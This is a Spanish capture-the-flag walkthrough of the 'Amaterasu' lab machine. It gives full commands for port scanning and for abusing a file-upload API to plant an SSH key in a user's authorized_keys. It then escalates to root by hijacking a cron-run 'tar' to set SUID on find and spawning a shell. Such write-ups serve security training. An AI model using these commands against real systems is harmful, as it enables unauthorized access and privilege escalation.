# Amaterasu

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FRLtMk81VglfnbuvU99Z6%2FSQL%20injection%20vulnerability%20in%20WHERE%20clause%20allowing%20retrieval%20of%20hidden%20data%20(9).png?alt=media&#x26;token=b320034a-282e-45fc-b79e-786a2753ee4b" alt=""><figcaption></figcaption></figure>

## Enumeración

### Puertos abiertos

Comenzamos la resolución de la máquina Amaterasu, enumerando que puertos tiene abiertos el sistema objetivo.&#x20;

```
nmap -p- --open --min-rate 500 -Pn -n 192.168.180.249
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FooRTyCAaMWRkzOCDgOPb%2Fimage.png?alt=media&#x26;token=c4d9982b-17b4-4706-843c-7df8d66ed22a" alt=""><figcaption></figcaption></figure>

Tres puertos abiertos: 21, 25022, 33414 y 40080. Seguimos enumerando de manera profunda los servicios abiertos.&#x20;

```
nmap -p21,25022,33414,40080 -sVC -Pn -n 192.168.180.249
```

```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-18 06:48 EDT
Nmap scan report for 192.168.180.249
Host is up (0.051s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.163
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
25022/tcp open  ssh     OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 68c605e8dcf29a2a789beea1aef6381a (ECDSA)
|_  256 e989ccc21714f3bc6221064a5e7180ce (ED25519)
33414/tcp open  unknown
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/2.2.3 Python/3.9.13
|     Date: Tue, 18 Jul 2023 10:49:03 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   Help: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request syntax ('HELP').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|     </html>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
40080/tcp open  http    Apache httpd 2.4.53 ((Fedora))
|_http-server-header: Apache/2.4.53 (Fedora)
|_http-title: My test page
| http-methods: 
|_  Potentially risky methods: TRACE
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33414-TCP:V=7.93%I=7%D=7/18%Time=64B66E1C%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,184,"HTTP/1\.1\x20404\x20NOT\x20FOUND\r\nServer:\x20Werkzeug/
SF:2\.2\.3\x20Python/3\.9\.13\r\nDate:\x20Tue,\x2018\x20Jul\x202023\x2010:
SF:49:03\x20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent
SF:-Length:\x20207\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>\n<htm
SF:l\x20lang=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1
SF:>\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20se
SF:rver\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20c
SF:heck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(HTTPOptions
SF:,184,"HTTP/1\.1\x20404\x20NOT\x20FOUND\r\nServer:\x20Werkzeug/2\.2\.3\x
SF:20Python/3\.9\.13\r\nDate:\x20Tue,\x2018\x20Jul\x202023\x2010:49:03\x20
SF:GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\
SF:x20207\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>\n<html\x20lang
SF:=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\n<p>The
SF:\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\x2
SF:0If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x20y
SF:our\x20spelling\x20and\x20try\x20again\.</p>\n")%r(RTSPRequest,1F4,"<!D
SF:OCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\"
SF:>\n<html>\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\"
SF:>\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x
SF:20\x20\x20\x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20<h1>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>
SF:Error\x20code:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\
SF:x20Bad\x20request\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQ
SF:UEST\x20-\x20Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.<
SF:/p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(Help,1EF,"<!DOCTYPE\x20HTML
SF:\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x2
SF:0\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equi
SF:v=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20
SF:</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Er
SF:ror\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:
SF:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20requ
SF:est\x20syntax\x20\('HELP'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>E
SF:rror\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20
SF:request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x2
SF:0</body>\n</html>\n");
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.59 seconds

```

Interesante, puerto 21 (servidor FTP con acceso para usuario anonymous), 25022, 33414 y 40080 (Servidor Apache)

### Enumeración Web

La máquina objetivo está ejecutando un servidor Web en el puerto 40080. Veamos su contenido.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FO4JV6y4Jb1AwfRGuzAOj%2Fimage.png?alt=media&#x26;token=31e0e06c-1502-43c4-9bb3-2b4d50facbcd" alt=""><figcaption></figcaption></figure>

Vamos a enumerar directorios y archivos que puedan ser interesantes.&#x20;

```
dirsearch -u "http://192.168.180.249:40080/" -i 200,301 -t 20
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FVluJxEW3De47dfSYkrOA%2Fimage.png?alt=media&#x26;token=49647a3f-b074-449b-81ff-198712ee9e80" alt=""><figcaption></figcaption></figure>

No encontramos nada interesante.&#x20;

Realizamos el mismo proceso para el servicio que se está ejecutando en el puerto 33414.

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FoqHYwCjemhewpfG7g8eO%2Fimage.png?alt=media&#x26;token=e476abd7-4373-4067-9597-9c84d169583b" alt=""><figcaption></figcaption></figure>

Realizamos la enumeración de directorios y archivos.&#x20;

```
dirsearch -u "http://192.168.180.249:33414/" -i 200,301 -t 20
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FouGYZ8Drx4pTPdwdI8eF%2Fimage.png?alt=media&#x26;token=314f2411-9347-43a2-8bed-e44551eea837" alt=""><figcaption></figcaption></figure>

Encontramos dos directorios: /help e /info. Veamos su contenido. En el directorio /help, encontramos diferentes utilidades que hay disponibles.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FHFWSE94nBIvAzqXmdPVC%2Fimage.png?alt=media&#x26;token=2208ddf0-c9ee-4cf5-8300-9ed82c3e9a72" alt=""><figcaption></figcaption></figure>

En /info vemos lo siguiente:

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FkkwCWmFBVuFDPXDTQjxg%2Fimage.png?alt=media&#x26;token=2455f445-6dd6-4953-a308-b6499f21c1cc" alt=""><figcaption></figcaption></figure>

Vemos que estamos enumerando una API REST. También encontramos un posible usuario del sistema, "Alfredo".&#x20;

Veamos que información interesante podemos enumerar con las utilidades que encontramos en el directorio /help.&#x20;

Podemos enumerar archivos del sistema.

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2Fnbslmbzyh7elM0QG3LAZ%2Fimage.png?alt=media&#x26;token=2bd4178f-688d-4ba4-89c4-448f530ef16b" alt=""><figcaption></figcaption></figure>

Además, podemos confirmar que "alfredo" es usuario del sistema.&#x20;

Existe una utilidad de carga de archivos pero con método POST.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FUpxs2gsR6NDsFKxLphHa%2Fimage.png?alt=media&#x26;token=c4b1ceaa-4e3e-4e2e-b1a0-ff2eaa8fdfec" alt=""><figcaption></figcaption></figure>

Pero tenemos un posible vector de entrada.&#x20;

## Explotación

Vamos a intentar subir archivos realizando peticiones de tipo POST utilizando cURL. Esto lo hacemos de la siguiente forma:

```
curl -X POST http://192.168.180.249:33414/file-upload
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FzYMfcPmffFW8C4ho1MEz%2Fimage.png?alt=media&#x26;token=74b2b7a8-47ec-4f35-bce7-96ef8c54d66d" alt=""><figcaption></figcaption></figure>

No hemos adjuntado ningún archivo en la petición. Vamos a crear un archivo de pruebas para tratar de subirlo a la máquina objetivo.

```
curl -F file=@securiters.txt http://192.168.180.249:33414/file-upload
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2F58TPT70ZJPnPn2TzXT1k%2Fimage.png?alt=media&#x26;token=1215b043-d03f-48f6-bcb7-e8582e37dd78" alt=""><figcaption></figcaption></figure>

```
curl -F filename="securiters.txt" -F file=@securiters.txt http://192.168.180.249:33414/file-upload
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FHxLaberS4ySwRfLhHo2h%2Fimage.png?alt=media&#x26;token=331bcfcf-bd3f-4055-9a66-cddc065b28b4" alt=""><figcaption></figcaption></figure>

Se ha subido el archivo, vamos a comprobar en que directorio está en el servidor.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FER1oDrpxfAPmNSIumHnm%2Fimage.png?alt=media&#x26;token=9eb35f92-9fd1-4c6a-9ef2-338f230cc246" alt=""><figcaption></figcaption></figure>

Vamos a comprobar ahora, si podemos subir archivos al directorio del usuario "alfredo".&#x20;

```
curl -F filename="/home/alfredo/securiters.txt" -F file=@securiters.txt http://192.168.180.249:33414/file-upload
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FcqD8pZZWcUYnt19rtaVN%2Fimage.png?alt=media&#x26;token=6887616f-635a-419d-811c-a6aaa92e5519" alt=""><figcaption></figcaption></figure>

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2Ff0903IZN7DYFvIKrkcG5%2Fimage.png?alt=media&#x26;token=271766a9-7a52-49ed-b958-163b6107159c" alt=""><figcaption></figcaption></figure>

Comprobemos si podemos acceder al directorio .ssh de este usuario.&#x20;

```
curl -F filename="/home/alfredo/.ssh/securiters.txt" -F file=@securiters.txt http://192.168.180.249:33414/file-upload
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FyVW7Kz1YAHvb9htHEMov%2Fimage.png?alt=media&#x26;token=612ffc3b-31e2-46d2-8161-1e2f2889c39a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FLZkNvw5XVlUETZDP4rNT%2Fimage.png?alt=media&#x26;token=b901fb41-c877-45cc-883f-3db921f32f3b" alt=""><figcaption></figcaption></figure>

Sabiendo esto, ¿que podemos hacer? Podemos tratar de subir una clave pública a este directorio para poder conectarnos como usuario "alfredo" sin necesidad de contraseña. Vamos a hacerlo de la siguente manera:

```
curl -F filename="/home/alfredo/.ssh/authorized_keys" -F file=@id_rsa.pub http://192.168.180.249:33414/file-upload
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FugJMVe7ZWN6NolEK66Bm%2Fimage.png?alt=media&#x26;token=d4bded9a-f634-4360-a952-ceffb0338dc1" alt=""><figcaption></figcaption></figure>

Pero solo se permiten determinados tipos de archivos.

<pre><code>cp id_rsa.pub id_rsa.pub.txt 
<strong>curl -F filename="/home/alfredo/.ssh/authorized_keys" -F file=@id_rsa.pub.txt http://192.168.180.249:33414/file-upload
</strong></code></pre>

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FZ8ZOY3c9RIqArfXhuwyU%2Fimage.png?alt=media&#x26;token=4125e1bd-1b2c-4691-ac60-dd69ea134b0c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2F7caCrypmajgrjDDoDhoy%2Fimage.png?alt=media&#x26;token=2719b9b3-2dba-4367-bcc2-fbd15b61e4f6" alt=""><figcaption></figcaption></figure>

Habiendo transferido correctamente el archivo, ahora podremos conectarnos a la máquina vía SSH.

```
ssh -p 25022 -i id_rsa alfredo@192.168.180.249
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FZts53rIGC9qpAy0g4DhB%2Fimage.png?alt=media&#x26;token=6eb6a91c-030c-4af7-a97b-60f561d14473" alt=""><figcaption></figcaption></figure>

Ya tenemos acceso a la máquina como usuario "Alfredo". Vamos a buscar la flag local.txt.

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2F6D8k0OeWtrKdBcLvu252%2Fimage.png?alt=media&#x26;token=6829869c-f041-4e94-bc53-76761afee83c" alt=""><figcaption></figcaption></figure>

## Elevación de privilegios

Enumeramos el archivo /etc/crontab

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FgFsRbGVnhONeUCEiQ2l3%2Fimage.png?alt=media&#x26;token=9ac457b3-52fc-417c-8a49-93d065378429" alt=""><figcaption></figcaption></figure>

Vemos un ejecutable bash que se ejecuta cada minuto. Veamos el contenido de este script.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FMHxxxiNto2Ph5tbi47q4%2Fimage.png?alt=media&#x26;token=6cd0d998-4f64-45ed-a078-c986cf407c6e" alt=""><figcaption></figcaption></figure>

Vemos el directorio /restapi.

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2Fn0c5QhGWp1ckVC2gz3Dd%2Fimage.png?alt=media&#x26;token=8084b337-1fe2-4fdb-bc02-2ef7c991c2cf" alt=""><figcaption></figcaption></figure>

No existe ejecutable "tar" así que podemos crear uno malicioso de la siguiente manera:&#x20;

```
nano tar

#!/bin/bash
chmod u+s /usr/bin/find
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2F24H8utxJ2fP2U4ze2IVG%2Fimage.png?alt=media&#x26;token=b164ef7a-2a7d-4ed4-98f7-6aacaacdcfa3" alt=""><figcaption></figcaption></figure>

Damos permisos

```
chmod +x tar
```

Después de un minuto, vamos a comprobar los archivos con permisos SUID

```
find / -perm -u=s -type f 2>/dev/null
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FyUQV3Hcn6jrCHHSxgQoQ%2Fimage.png?alt=media&#x26;token=a26ef571-5025-4bd9-b900-34b1b2deb13e" alt=""><figcaption></figcaption></figure>

Visitamos [GTFOBins](https://gtfobins.github.io/gtfobins/find/#suid) para ver como podemos elevar privilegios aprovechando esto.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2FYCkfbXbcD3KOMU2G7i0T%2Fimage.png?alt=media&#x26;token=3fe1a70a-9826-4bd2-aa6b-fab38842f7dc" alt=""><figcaption></figcaption></figure>

```
/usr/bin/find . -exec /bin/sh -p \; -quit
```

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2Fku774wXlc2sTaQIrqtkC%2Fimage.png?alt=media&#x26;token=3c57e491-47bc-4577-b463-ae512556a445" alt=""><figcaption></figcaption></figure>

Solo quedará buscar la flag proof.txt para finalizar el CTF.&#x20;

<figure><img src="https://264470966-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FeX9VhvbkT8Ff8eDftQXl%2Fuploads%2F9CMr4yQR4EMJ3jAj6Lhe%2Fimage.png?alt=media&#x26;token=820203e7-c078-4a8f-a773-26b184bfc2f8" alt=""><figcaption></figcaption></figure>
